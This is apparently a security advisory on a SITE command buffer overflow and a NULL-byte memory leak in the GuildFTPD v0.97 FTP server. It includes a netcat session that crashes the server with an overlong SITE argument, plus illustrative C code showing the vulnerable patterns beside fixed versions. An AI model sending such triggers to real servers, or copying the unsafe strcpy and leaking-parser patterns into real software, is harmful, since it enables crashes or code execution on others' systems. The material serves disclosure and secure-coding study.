COMMAND
GuildFTPD
SYSTEMS AFFECTED
GuildFTPD v0.97 (probably earlier versions too)
PROBLEM
The following is based on Defcom Labs Advisory def-2001-27 by
Andreas Junestam and Janne Sarendal. GuildFTPD contains two
different problems:
1. Buffer overrun in the SITE command with the ability to execute
arbitrary code
2. A memory leak in the input parsing code
* SITE command Buffer Overflow
All the SITE commands are handled in a DLL (sitecmd.dll) which
suffers from a buffer overflow. By sending a SITE command
greater than 261 bytes, a buffer will overflow and it is
possible to execute arbitrary code. We have chosen not to
include the working exploit.
C:\>nc 127.0.0.1 21
220-GuildFTPD FTP Server (c) 1999,2000
220-Version 0.97
220 Please enter your name:
user a
331 User name okay, Need password.
pass a
230 User logged in.
site AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
Access violation - code c0000005 (first chance)
eax=01450000 ebx=00000001 ecx=00000000 edx=00130608 esi=10030000 edi=009ed9e0
eip=41414141 esp=01bcf9b4 ebp=10030000 iopl=0 nv up ei pl nz na po nc
cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00010206
* Memory Leak DoS
The input parsing code in GuildFTPD contains a memory leak that
is triggered by any request containing a NULL (0x00)
character. GuildFTPD will still answer new requests, but
eventually the server will run out of memory and the machine
will crash.
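As an added illustration (not GuildFTPD's source, which the advisory does not show), here is a hypothetical C reconstruction of both bug classes beside their hardened forms; the 261-byte buffer size is taken from the advisory's threshold, and the handler and parser names are assumed. It serves both the SITE overflow and the NULL-byte leak above.

```c
#include <stdlib.h>
#include <string.h>
#define SITE_ARG_MAX 261  /* assumed buffer size: the advisory's 261-byte threshold */
static long g_live_allocs = 0;  /* instrumentation: heap allocations not yet freed */
/* Vulnerable SITE-handler pattern: unbounded strcpy into a fixed stack buffer (cf. eip=41414141). */
static int site_unsafe(const char *arg) {
    char buf[SITE_ARG_MAX];
    strcpy(buf, arg);                       /* no length check */
    return (int)strlen(buf);
}

/* Hardened handler: refuse any argument that does not fit with its terminator. */
static int site_fixed(const char *arg) {
    char buf[SITE_ARG_MAX];
    size_t n = strlen(arg);
    if (n >= sizeof buf) return -1;         /* caller answers 501 and drops the request */
    memcpy(buf, arg, n + 1);
    return (int)n;
}

/* Leak-prone parser: heap copy of the request, early return on an embedded NUL
 * without freeing it. Every such request loses one allocation for good. */
static int parse_request_leaky(const char *req, size_t len) {
    char *copy = malloc(len + 1);
    if (!copy) return -1;
    g_live_allocs++;
    memcpy(copy, req, len); copy[len] = '\0';
    if (strlen(copy) != len) return -2;     /* BUG: early return skips free(copy) */
    free(copy); g_live_allocs--;
    return 0;
}

/* Fixed parser: validate before allocating, and release the copy on every path. */
static int parse_request_fixed(const char *req, size_t len) {
    if (memchr(req, '\0', len) != NULL) return -2;  /* reject NUL before malloc */
    char *copy = malloc(len + 1);
    if (!copy) return -1;
    g_live_allocs++;
    memcpy(copy, req, len); copy[len] = '\0';
    free(copy); g_live_allocs--;
    return 0;
}
/* Allocation delta after one constructed request carrying an embedded NUL byte. */
static long leak_delta(int (*parser)(const char *, size_t)) {
    static const char req[] = "USER a\0b";  /* 8 bytes, NUL at offset 6 */
    long before = g_live_allocs;
    parser(req, sizeof req - 1);
    return g_live_allocs - before;
}
```

leak_delta(parse_request_leaky) returns 1 (one allocation lost per NUL-bearing request), while the fixed parser returns 0; site_fixed refuses any argument of 261 bytes or more instead of overrunning the buffer.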
SOLUTION
This issue was brought to the developer's attention on the 24th of
April, 2001; there has been no response so far.